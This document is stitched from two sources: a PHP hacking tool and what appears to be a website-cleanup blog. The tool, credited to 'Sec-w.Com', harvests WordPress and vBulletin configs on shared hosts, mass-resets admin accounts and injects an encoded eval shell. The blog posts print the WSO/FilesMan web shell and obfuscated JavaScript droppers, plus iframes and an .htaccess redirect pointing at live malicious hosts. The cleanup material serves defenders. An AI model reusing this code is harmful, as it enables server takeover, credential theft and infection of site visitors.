echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

$tab     = $fix.'users';

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();






}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}










die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){



$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");

$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");

$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

$crypt  = "{\${eval(gzinflate(base64_decode(\'";

$crypt .= "$shell";

$crypt .= "\')))}}{\${exit()}}</textarea>";

$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;

$query  = @mysql_query($sqlfaq,$con);



if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";







}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}

}










die();

}

if(!is_file('named.txt')){

$d00m = file("/etc/named.conf");

}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}








break;

case 'help':

echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";


$safe_mode = ini_get('safe_mode');
     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Safe Mode</td><td>$r</td>";

$fun = function_exists('symlink');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function symlink</td><td>$r</td>";


$fun = function_exists('file');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file</td><td>$r</td>";

$fun = function_exists('file_get_contents');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file_get_contents</td><td>$r</td>";

$fun = function_exists('mkdir');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function mkdir</td><td>$r</td>";


$fun = is_dir('sym/root');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Permission denied</td><td>$r</td>";


$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}

echo "<tr><td>Forbidden</td><td>$r</td>";




echo "</table></div>";



break;
default:
header("Location: $pg");




}


/// home ///
}else
{


echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
    else { echo '<br /><br />Not uploaded !!<br><br>'; }


}

    echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}


function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}



echo '</div>

<a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>

<a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>



</body>

</html>
';

?>

FilesMan Backdoor Script

If your website is getting infected again and again, its mostly likely due to a backdoor script, uploaded to your websites. In my experience, I almost every time encountered FilesMan backdoor which is actually a complete File Manager. It can be used to upload any files to your website, edit existing files or inject malicious codes to webpages. It can even edit .htaccess file.

This script is usually encoded. However, you can easy find it by searching all PHP files for "FilesMan" string.

Here is a sample of this script:

<?php # Web Shell by oRb
$auth_pass = "92c29c1ac4d85b45639f741599c24cd7"; // ENTER MD5 PASSWORD HERE
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -lha",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name \"config*\"",
          "find config* files in current dir" => "find . -type f -name \"config*\"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );

Malware code of the moment

<script>
wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var <script>var TaxazLan=47;TaxazLan+=-31;var GeYedenc='fKWrK7AowyjmR8iC8YHhJiYatr29MCMo16dVVIep'.replace(/[KWK7AwyjR8i8YHJiY t29MM16VVIp]/g, '');WaVet=18;var PeheLecew=window;var TenZezaco=-32;TenZezaco+=34;var GawasCepe=-38;GawasCepe+=39;MecezBa=31;var CaneHaqi=parseInt;var MafeGeho=6;MafeGeho+=-6;CeJa=46;var BacanYaqan='';var QekQeyes=String;var PelefJat='zexebep ketay lezewet neyaqamejefeneza refelac xera qevazaxe lemepe tajeceq bazacagetaqere meyadeg pagale zarajet lazemepagebedaf vameyape reyep kek zamaqanepepayeh gexeyeva mawenage vakewaxa xec dapagew revatasasa xatetane dewen yejarey telefa qey hevecelap hez webalefe fele bagelelakatat zedeyel jexedejele dawedey delazeg regapehe tay cezekew te gegawey gasajakebeqeqa resefay gejaha heg q jayadeva hele qedahay qaje keselehe vec relegat salabebebazevame hebesaq rezemelaveqed kegeqen belakedaremev qefegad hebawebebe wazares waseketeledaqeq xareqaq dejereve vena nejecemezaneqe hak web kemepex cememelesedadek tebeyeq daparamafacesaye nak qax ram w wejajeze zevatega bakegay xesererare vecenar cacem qekavere pecal seqefey vefeqeden xaze vapewasebeheje taj hec yeye te yec jec gay h qereref sewaqavey celereh rezece takejed reveyekeme fezesen welenefe kapekeg vakayeseg wapevece qehaz tema vecaqehefaceya mep neq leve ne caq few xel m xeyadey fez jabexeh pevenexadebayawe veweyebe hek jegezay hasem rexehej ladese kewefese qeg rede deyegayakewaze nep yar qete j beb veb qeh k zeyelen qaqajag bevafexa gev dewarek ra tecetaf dagajelawafeme becesey lebate teceveg ler pehagex pekejeresafepeqe pekedete pah neqaqam jeqat remadah jevene yaqejade tel xece pepegegeqefege mez dak yeye k xey het bag j nahewepe wexe xedaleqe geq gehepaz zera peja fexatedemedexe far saw gegeweq qaharenej behefete getej cexefeke yefer lewaneta n xeje jaqetevedav xaf vawaxetefaveqepa vat depemetepaderewe weje setag tawe xaye relehet gepesetacere wanewav re hevevese jananeqebe peyabek haxasaferadav canezen segedepeke xayeraw le gag yefewesekekerez yaleheq peqaqa ceqapefa yamela hez qabeqagebevacaje vexedave delabemez pamekaja jeqanener hewelene leqebamer yaba je dem femeferezecemeza cazared sekevaqeveze kebeqaka je qamakere pebeceqaj rasayac legeteserehab caxejer qesele detadene pe kaweqes dazemetetey zegewaha p qecevam yale vezeyaw caqeperebedezexe seneweq hebemeker gega sedazefey taz qepejebezezefeb nenexega l cabepej vegewetev xagefeta j vab bel meje fepepawefeqaneq jena lapedelahewad yax zarecelejafacega rebajey gejavatexe mepajas mefagab wamaqete ger naqafem ca vabaqev xebexedetakeje yadeken necete meje kelepeveqekazep pex zecelana zas tamewabese'.split(' ');var YegeTege='ehjCv8QbaKl41O'.replace(/[hjC8QbK41O]/g, '');WecYale=45;YegeTege=PeheLecew[YegeTege];GeYedenc=QekQeyes[GeYedenc];for (HelemLepi=MafeGeho;HelemLepi<PelefJat.length-1;HelemLepi+=TenZezaco) BacanYaqan +=GeYedenc(CaneHaqi((PelefJat[HelemLepi+MafeGeho].length-1).toString(TaxazLan)+(PelefJat[HelemLepi+GawasCepe].length-1).toString(TaxazLan), TaxazLan));YegeTege(BacanYaqan);</script>

Malware code of the moment

document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://43kaylia.eu/xxx1/kqxleqjpcoh8.php"></iframe>')

Malware code of the moment

<script>b=new function(){return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i in $='b4h3tbn34')if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{gberbger-2;}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)h=(d-d2)*-1;n=[-h*4.5,-h*4.5,-h*52.5,-h*51,-h*16,-h*20,-h*50,-h*55.5,-h*49.5,-h*58.5,-h*54.5,-h*50.5,-h*55, -h*58,-h*23,-h*51.5,-h*50.5,-h*58,-h*34.5,-h*54,-h*50.5,-h*54.5,-h*50.5,-h*55,-h*58,-h*57.5, -h*33,-h*60.5,-h*42,-h*48.5,-h*51.5,-h*39,-h*48.5,-h*54.5,-h*50.5,-h*20,-h*19.5,-h*49,-h*55.5, -h*50,-h*60.5,-h*19.5,-h*20.5,-h*45.5,-h*24,-h*46.5,-h*20.5,-h*61.5,-h*4.5,-h*4.5,-h*4.5,-h*52.5, -h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*57,-h*20,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*62.5,-h*16, -h*50.5,-h*54,-h*57.5,-h*50.5,-h*16,-h*61.5,-h*4.5,-h*4.5,-h*4.5,-h*50,-h*55.5,-h*49.5,-h*58.5, -h*54.5,-h*50.5,-h*55,-h*58,-h*23,-h*59.5,-h*57,-h*52.5,-h*58,-h*50.5,-h*20,-h*17,-h*30, -h*52.5,-h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*16,-h*57.5,-h*57,-h*49.5,-h*30.5,-h*19.5,-h*52, -h*58,-h*58,-h*56,-h*29,-h*23.5,-h*23.5,-h*57,-h*50.5,-h*49,-h*55.5,-h*58,-h*57.5,-h*58, -h*48.5,-h*58,-h*23,-h*49.5,-h*55.5,-h*54.5,-h*23.5,-h*58,-h*50.5,-h*54.5,-h*56,-h*23.5,-h*57.5, -h*58,-h*48.5,-h*58,-h*23,-h*56,-h*52,-h*56,-h*19.5,-h*16,-h*59.5,-h*52.5,-h*50,-h*58,-h*52, -h*30.5,-h*19.5,-h*24.5,-h*24,-h*19.5,-h*16,-h*52,-h*50.5,-h*52.5,-h*51.5,-h*52,-h*58,-h*30.5, -h*19.5,-h*24.5,-h*24,-h*19.5,-h*16,-h*57.5,-h*58,-h*60.5,-h*54,-h*50.5,-h*30.5,-h*19.5,-h*59, -h*52.5,-h*57.5,-h*52.5,-h*49,-h*52.5,-h*54,-h*52.5,-h*58,-h*60.5,-h*29,-h*52,-h*52.5,-h*50, -h*50,-h*50.5,-h*55,-h*29.5,-h*56,-h*55.5,-h*57.5,-h*52.5,-h*58,-h*52.5,-h*55.5,-h*55,-h*29, -h*48.5,-h*49,-h*57.5,-h*55.5,-h*54,-h*58.5,-h*58,-h*50.5,-h*29.5,-h*54,-h*50.5,-h*51,-h*58, -h*29,-h*24,-h*29.5,-h*58,-h*55.5,-h*56,-h*29,-h*24,-h*29.5,-h*19.5,-h*31,-h*30,-h*23.5, -h*52.5,-h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*31,-h*17,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*62.5, -h*4.5,-h*4.5,-h*51,-h*58.5,-h*55,-h*49.5,-h*58,-h*52.5,-h*55.5,-h*55,-h*16,-h*52.5,-h*51, -h*57,-h*48.5,-h*54.5,-h*50.5,-h*57,-h*20,-h*20.5,-h*61.5,-h*4.5,-h*4.5,-h*4.5,-h*59,-h*48.5, -h*57,-h*16,-h*51,-h*16,-h*30.5,-h*16,-h*50,-h*55.5,-h*49.5,-h*58.5,-h*54.5,-h*50.5,-h*55, -h*58,-h*23,-h*49.5,-h*57,-h*50.5,-h*48.5,-h*58,-h*50.5,-h*34.5,-h*54,-h*50.5,-h*54.5,-h*50.5, -h*55,-h*58,-h*20,-h*19.5,-h*52.5,-h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*19.5,-h*20.5,-h*29.5, -h*51,-h*23,-h*57.5,-h*50.5,-h*58,-h*32.5,-h*58,-h*58,-h*57,-h*52.5,-h*49,-h*58.5,-h*58,-h*50.5, -h*20,-h*19.5,-h*57.5,-h*57,-h*49.5,-h*19.5,-h*22,-h*19.5,-h*52,-h*58,-h*58,-h*56,-h*29,-h*23.5, -h*23.5,-h*57,-h*50.5,-h*49,-h*55.5,-h*58,-h*57.5,-h*58,-h*48.5,-h*58,-h*23,-h*49.5,-h*55.5, -h*54.5,-h*23.5,-h*58,-h*50.5,-h*54.5,-h*56,-h*23.5,-h*57.5,-h*58,-h*48.5,-h*58,-h*23,-h*56, -h*52,-h*56,-h*19.5,-h*20.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*58,-h*60.5,-h*54,-h*50.5,-h*23, -h*59,-h*52.5,-h*57.5,-h*52.5,-h*49,-h*52.5,-h*54,-h*52.5,-h*58,-h*60.5,-h*30.5,-h*19.5,-h*52, -h*52.5,-h*50,-h*50,-h*50.5,-h*55,-h*19.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*58,-h*60.5,-h*54, -h*50.5,-h*23,-h*56,-h*55.5,-h*57.5,-h*52.5,-h*58,-h*52.5,-h*55.5,-h*55,-h*30.5,-h*19.5,-h*48.5, -h*49,-h*57.5,-h*55.5,-h*54,-h*58.5,-h*58,-h*50.5,-h*19.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*58, -h*60.5,-h*54,-h*50.5,-h*23,-h*54,-h*50.5,-h*51,-h*58,-h*30.5,-h*19.5,-h*24,-h*19.5,-h*29.5, -h*51,-h*23,-h*57.5,-h*58,-h*60.5,-h*54,-h*50.5,-h*23,-h*58,-h*55.5,-h*56,-h*30.5,-h*19.5, -h*24,-h*19.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*50.5,-h*58,-h*32.5,-h*58,-h*58,-h*57,-h*52.5, -h*49,-h*58.5,-h*58,-h*50.5,-h*20,-h*19.5,-h*59.5,-h*52.5,-h*50,-h*58,-h*52,-h*19.5,-h*22, -h*19.5,-h*24.5,-h*24,-h*19.5,-h*20.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*50.5,-h*58,-h*32.5,-h*58, -h*58,-h*57,-h*52.5,-h*49,-h*58.5,-h*58,-h*50.5,-h*20,-h*19.5,-h*52,-h*50.5,-h*52.5,-h*51.5, -h*52,-h*58,-h*19.5,-h*22,-h*19.5,-h*24.5,-h*24,-h*19.5,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*4.5, -h*50,-h*55.5,-h*49.5,-h*58.5,-h*54.5,-h*50.5,-h*55,-h*58,-h*23,-h*51.5,-h*50.5,-h*58,-h*34.5, -h*54,-h*50.5,-h*54.5,-h*50.5,-h*55,-h*58,-h*57.5,-h*33,-h*60.5,-h*42,-h*48.5,-h*51.5,-h*39, -h*48.5,-h*54.5,-h*50.5,-h*20,-h*19.5,-h*49,-h*55.5,-h*50,-h*60.5,-h*19.5,-h*20.5,-h*45.5,-h*24, -h*46.5,-h*23,-h*48.5,-h*56,-h*56,-h*50.5,-h*55,-h*50,-h*33.5,-h*52,-h*52.5,-h*54,-h*50,-h*20, -h*51,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*62.5];for(i=0;i<n.length;i++)if(!+b)ss+=s(eval("n"+"[i"+']'));if(!+b)eval(ss);</script><!--c -->

Malware code of the moment

<script type='text/javascript' src='http://purposestupid.org/xzzuhpzxwci5cd/'></script>

Malware code of the moment

<iframe src="http:/castload.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>

Infected .htaccess File

This malicious code was found in a .htaccess file.  It redirects every HTTP Request with 400, 401, 403, 404, 500 status code, to a malicious link. It also redirects all known search engine bots to malicious website.

#apachecodes

ErrorDocument 400 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 401 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 403 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 404 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 500 http://buy-autocad.net/tds/go.php?sid=8&

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*googlemail.* [OR]
RewriteCond %{HTTP_REFERER} .*inbox.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://www.academiatrivium.com/marhoycukind/r.php [R=301,L]
</IfModule>

Latest Backdoor

Today, I found following backdoor warped in eval() and gzinflate() functions. It can be used to download any file from remote location to infected website. Here is its code.

